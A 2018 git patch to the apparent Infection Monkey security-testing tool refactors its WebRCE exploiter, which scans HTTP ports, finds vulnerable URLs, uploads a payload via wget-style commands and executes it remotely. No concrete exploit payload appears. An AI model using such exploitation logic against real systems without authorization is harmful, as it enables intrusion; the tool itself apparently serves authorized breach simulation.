From eae3f3440d4d383e7ac0d0e547a2a3a691c75f05 Mon Sep 17 00:00:00 2001
From: Vakaris <vaoxygen@gmail.com>
Date: Wed, 22 Aug 2018 13:33:36 +0300
Subject: [PATCH] Refactored exploit_host and added get_exploit_config

---
 infection_monkey/exploit/web_rce.py | 56 ++++++++++++++++++-----------
 1 file changed, 35 insertions(+), 21 deletions(-)

diff --git a/infection_monkey/exploit/web_rce.py b/infection_monkey/exploit/web_rce.py
index 777b256bd..c907ca08e 100644
--- a/infection_monkey/exploit/web_rce.py
+++ b/infection_monkey/exploit/web_rce.py
@@ -37,37 +37,51 @@ class WebRCE(HostExploiter):
         self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
         self.skip_exist = self._config.skip_exploit_if_file_exist
 
+    @staticmethod
+    def get_exploit_config():
+        """
+        Method that creates a dictionary of configuration values for exploit
+        :return: configuration dict
+        """
+        exploit_config = dict()
+
+        # dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
+        # it's file to the default destination path.
+        exploit_config['dropper'] = False
+
+        # upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
+        # Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used.
+        exploit_config['upload_commands'] = None
+
+        # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
+        exploit_config['url_extensions'] = None
+
+        # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
+        exploit_config['stop_checking_urls'] = False
+
+        # blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
+        exploit_config['blind_exploit'] = False
+
+        return exploit_config
+
     def exploit_host(self):
         """
         Override this method to pass custom arguments to default_exploit_host
         :return: True if exploited, False otherwise
         """
-        return self.default_exploit_host()
-
-    def default_exploit_host(self, dropper=False, upload_commands=None, url_extensions=None,
-                             stop_checking_urls=False, blind_exploit=False):
-        """
-        Standard framework usage (call this method in exploit_host function):
-        :param dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
-        it's file to the default destination path.
-        :param upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
-        Command must have "monkey_path" and "http_path" format parameters.
-        :param url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
-        :param stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
-        :param blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
-        :return: True if exploited and False otherwise.
-        """
+        # We get exploit configuration
+        exploit_config = self.get_exploit_config()
         # Get open ports
         ports = self.get_ports_w(self.HTTP, ["http"])
         if not ports:
             return False
         # Get urls to try to exploit
-        urls = self.build_potential_urls(ports, url_extensions)
+        urls = self.build_potential_urls(ports, exploit_config['url_extensions'])
         vulnerable_urls = []
         for url in urls:
             if self.check_if_exploitable(url):
                 vulnerable_urls.append(url)
-                if stop_checking_urls:
+                if exploit_config['stop_checking_urls']:
                     break
         self._exploit_info['vulnerable_urls'] = vulnerable_urls
 
@@ -75,16 +89,16 @@ class WebRCE(HostExploiter):
             return False
 
         # Skip if monkey already exists and this option is given
-        if not blind_exploit and self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
+        if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
             LOG.info("Host %s was already infected under the current configuration, done" % self.host)
             return True
 
         # Check for targets architecture (if it's 32 or 64 bit)
-        if not blind_exploit and not self.set_host_arch(vulnerable_urls[0]):
+        if not exploit_config['blind_exploit'] and not self.set_host_arch(vulnerable_urls[0]):
             return False
 
         # Upload the right monkey to target
-        data = self.upload_monkey(vulnerable_urls[0], upload_commands)
+        data = self.upload_monkey(vulnerable_urls[0], exploit_config['upload_commands'])
 
         if data is not False and data['response'] is False:
             return False
@@ -94,7 +108,7 @@ class WebRCE(HostExploiter):
             return False
 
         # Execute remote monkey
-        if self.execute_remote_monkey(vulnerable_urls[0], data['path'], dropper) is False:
+        if self.execute_remote_monkey(vulnerable_urls[0], data['path'], exploit_config['dropper']) is False:
             return False
 
         return True